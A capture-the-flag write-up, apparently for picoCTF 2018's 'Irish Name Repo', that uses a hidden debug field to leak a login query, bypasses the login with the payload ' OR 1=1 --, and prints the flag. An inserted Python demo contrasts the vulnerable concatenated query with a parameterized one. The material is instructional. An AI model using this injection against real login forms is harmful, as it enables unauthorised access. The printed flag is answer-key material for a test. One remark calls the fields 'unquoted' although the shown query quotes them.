Tags: sqli 

Rating:

The hint here seems to point at an
[SQL injection](https://www.owasp.org/index.php/SQL_Injection), but let's
browse around the app first. We have access to three views:

1. The index, which has nothing interesting
2. A "support" page
3. An "admin login page"

The support page contains another clue pointing at an SQL injection:

> Hi. I tried adding my favorite Irish person, Conan O'Brien. But I keep
> getting something called a SQL Error

With that in mind, we can look at the login page. Inspecting the source, we see
there's a hidden `debug` field:

```html
<form action="login.php" method="POST">
<fieldset>
<div class="form-group">
<label for="username">Username:</label>
<input type="text" id="username" name="username" class="form-control">
</div>
<div class="form-group">
<label for="password">Password:</label>
<div class="controls">
<input type="password" id="password" name="password" class="form-control">
</div>
</div>
<input type="hidden" name="debug" value="0">

<div class="form-actions">
<input type="submit" value="Login" class="btn btn-primary">
</div>
</fieldset>
</form>
```

To confirm that the field does something, I sent a request with a random username and no password (Note:
I used Burp Suite's proxy and repeater to manipulate the requests). With
`debug=0`, we get:

```html
<h1>Login failed.</h1>
```

and with `debug=1`:

```html
username: iodbh
password:
SQL query: SELECT * FROM users WHERE name='aaa' AND password=''
<h1>Login failed.</h1>
```

Great, now we know exactly how the SQL query is constructed: both fields are
concatenated straight into the string, unquoted, which is also why the
apostrophe in "O'Brien" produced an error on the support page. We can make it
return every row by sending `' OR 1=1 --` as the username and an empty
password, which ends up building the following query:

```sql
SELECT * FROM users WHERE name='' OR 1=1 --' AND password=''
```

Since anything after `--` up to the end of the line is treated as a comment,
the `AND password=''` clause is discarded and the effective query is
(one caveat: MySQL only honours `--` when it is followed by whitespace, so
keep a trailing space after the dashes, or use `#` instead, if the payload is
rejected there):

```sql
SELECT * FROM users WHERE name='' OR 1=1
```
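To see the whole chain end to end, here is an added example that is not part of the original writeup: it rebuilds the challenge's string-concatenated query against an in-memory SQLite database (the real backend and `users` schema are unknown, so the two-row table and the column names are assumptions), reproduces the "O'Brien" SQL error from the support page, runs the `' OR 1=1 --` bypass, and then shows that the same input is harmless once the query uses bound parameters.

```python
import sqlite3

# Constructed sample data; the challenge's real users table is not known.
SAMPLE_USERS = [
    ("admin", "s3cret"),
    ("alice", "hunter2"),
]


def make_db():
    """In-memory SQLite database standing in for the challenge's backend."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def build_query(username, password):
    """String-concatenated query, mirroring the challenge's debug output."""
    return "SELECT * FROM users WHERE name='%s' AND password='%s'" % (
        username,
        password,
    )


def vulnerable_login(conn, username, password):
    """Returns the matching rows (login succeeds if any row comes back).
    Raises sqlite3.OperationalError on a malformed query, which is the
    'SQL Error' the support page complains about."""
    return conn.execute(build_query(username, password)).fetchall()


def safe_login(conn, username, password):
    """Same check with bound parameters: the input is data, never SQL."""
    return conn.execute(
        "SELECT * FROM users WHERE name=? AND password=?", (username, password)
    ).fetchall()


def demo():
    """Run the four scenarios and return their outcomes for inspection."""
    conn = make_db()
    results = {}

    # 1. An ordinary failed login: no row matches.
    results["wrong_password"] = len(vulnerable_login(conn, "admin", "nope"))

    # 2. The support-page symptom: an apostrophe breaks the query.
    try:
        vulnerable_login(conn, "Conan O'Brien", "")
        results["obrien_error"] = False
    except sqlite3.OperationalError:
        results["obrien_error"] = True

    # 3. The bypass: close the string, OR in a tautology, comment out the rest.
    payload = "' OR 1=1 --"
    results["bypass_query"] = build_query(payload, "")
    results["bypass_rows"] = len(vulnerable_login(conn, payload, ""))  # every row

    # 4. The same inputs against the parameterized version.
    results["safe_rows"] = len(safe_login(conn, payload, ""))
    results["safe_obrien_rows"] = len(safe_login(conn, "Conan O'Brien", ""))
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "->", value)
```

The bypass works in SQLite because `--` is a comment regardless of what follows it; against a MySQL backend the payload would need a trailing space after the dashes. The parameterized version needs no escaping at all: `' OR 1=1 --` and `Conan O'Brien` are both simply usernames that do not exist.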

If we try this payload, we get the flag in the response:
`picoCTF{con4n_r3411y_1snt_1r1sh_9cbc118f}`

Original writeup (http://blog.iodbh.net/picoctf2018-web-irish-name-repo.html).